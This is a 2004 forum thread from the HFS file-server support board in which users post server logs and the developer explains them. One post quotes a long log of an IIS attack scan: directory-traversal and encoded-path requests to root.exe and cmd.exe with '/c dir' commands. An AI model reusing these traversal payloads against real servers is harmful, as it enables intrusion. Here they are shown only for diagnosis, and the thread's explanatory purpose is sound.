rejetto forum

Software => HFS ~ HTTP File Server => Topic started by: Chez on February 18, 2004, 04:14:02 PM

Title: Check this out...
Post by: Chez on February 18, 2004, 04:14:02 PM

Look what I found in my HFS log:

07:58:31  64.166.117.133:2702 Requested GEThttp://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi
07:58:31  64.166.117.133:2702 Fully downloaded


What the hell is this ?

Title: Check this out...
Post by: rejetto on February 18, 2004, 09:28:17 PM

someone requested that URL to your HFS.
i guess HFS replied a 404 error, but older builds (current is rc13) had a bug showing "fully downloaded" in the log for errors too

Title: Check this out...
Post by: SAT on February 19, 2004, 03:11:36 AM

Hello Rejetto can you tell me what this user was doing? & how can I tell what information he recieved?

2/18/2004 1:46:15 PM  24.59.78.218:3196 Connected
2/18/2004 1:46:15 PM  24.59.78.218:3196 Requested GET/scripts/root.exe?/c dir
2/18/2004 1:46:15 PM  24.59.78.218:3196 Fully downloaded
2/18/2004 1:46:16 PM  24.59.78.218:3298 Connected
2/18/2004 1:46:16 PM  24.59.78.218:3298 Requested GET/MSADC/root.exe?/c dir
2/18/2004 1:46:16 PM  24.59.78.218:3298 Fully downloaded
2/18/2004 1:46:17 PM  24.59.78.218:3347 Connected
2/18/2004 1:46:17 PM  24.59.78.218:3347 Requested GET/c/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:17 PM  24.59.78.218:3347 Fully downloaded
2/18/2004 1:46:18 PM  24.59.78.218:3371 Connected
2/18/2004 1:46:18 PM  24.59.78.218:3371 Requested GET/d/winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:18 PM  24.59.78.218:3371 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3393 Connected
2/18/2004 1:46:19 PM  24.59.78.218:3393 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:19 PM  24.59.78.218:3393 Fully downloaded
2/18/2004 1:46:19 PM  24.59.78.218:3416 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3416 Requested GET/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3416 Fully downloaded
2/18/2004 1:46:20 PM  24.59.78.218:3430 Connected
2/18/2004 1:46:20 PM  24.59.78.218:3430 Requested GET/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:20 PM  24.59.78.218:3430 Fully downloaded
2/18/2004 1:46:21 PM  24.59.78.218:3450 Connected
2/18/2004 1:46:21 PM  24.59.78.218:3450 Requested GET/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:21 PM  24.59.78.218:3450 Fully downloaded
2/18/2004 1:46:22 PM  24.59.78.218:3509 Connected
2/18/2004 1:46:22 PM  24.59.78.218:3509 Requested GET/scripts/..Á../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:22 PM  24.59.78.218:3509 Fully downloaded
2/18/2004 1:46:23 PM  24.59.78.218:3530 Connected
2/18/2004 1:46:23 PM  24.59.78.218:3530 Requested GET/scripts/..À/../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:23 PM  24.59.78.218:3530 Fully downloaded
2/18/2004 1:46:24 PM  24.59.78.218:3549 Connected
2/18/2004 1:46:24 PM  24.59.78.218:3549 Requested GET/scripts/..À¯../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:24 PM  24.59.78.218:3549 Fully downloaded
2/18/2004 1:46:25 PM  24.59.78.218:3574 Connected
2/18/2004 1:46:25 PM  24.59.78.218:3574 Requested GET/scripts/..Áœ../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:25 PM  24.59.78.218:3574 Fully downloaded
2/18/2004 1:46:29 PM  24.59.78.218:3590 Connected
2/18/2004 1:46:35 PM  24.59.78.218:3590 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:35 PM  24.59.78.218:3590 Fully downloaded
2/18/2004 1:46:36 PM  24.59.78.218:3872 Connected
2/18/2004 1:46:36 PM  24.59.78.218:3872 Requested GET/scripts/..%5c../winnt/system32/cmd.exe?/c dir
2/18/2004 1:46:36 PM  24.59.78.218:3872 Fully downloaded

Title: Check this out...
Post by: rejetto on February 19, 2004, 03:41:42 AM

he's trying to exploit of IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

Title: Check this out...
Post by: SAT on February 19, 2004, 04:35:35 PM

Quote from: "rejetto"

he's trying to exploit of IIS
but no IIS here  :roll:
he got nothing

as i already said, the "fully downloaded" is a bug in the log of your version
update to get rid of it

Thanks for your reply sir. That is my ISP trying to see what I am sharing.
he's also looking for c: I am using F: :-)

I am running v1.6 rc11...I am having some trouble understanding how to automate creating log files daily , but otherwise am very gratefull for your work. This is a kick-ass http server.
I didnt see any links for donations? I want to donate.

Title: Check this out...
Post by: Anonymous on February 19, 2004, 07:15:59 PM

Quote from: "SAT"

I didnt see any links for donations? I want to donate.

Look here - right botton... :
http://www.rejetto.com/

Title: Check this out...
Post by: rejetto on February 19, 2004, 08:17:33 PM

daily log?
the log file is not locked most of time, so you can use an external "rotation" software (i think apache has one)

Title: Check this out...
Post by: SAT on February 20, 2004, 02:57:10 PM

Quote from: "Anonymous"

Quote from: "SAT"

I didnt see any links for donations? I want to donate.

Look here - right botton... :
http://www.rejetto.com/

I will "little bit each time...so I dont miss it"

Title: Check this out...
Post by: rejetto on February 20, 2004, 07:54:55 PM

thank you for the donation :)
really appreciated
i shall put the paypal button somewhere else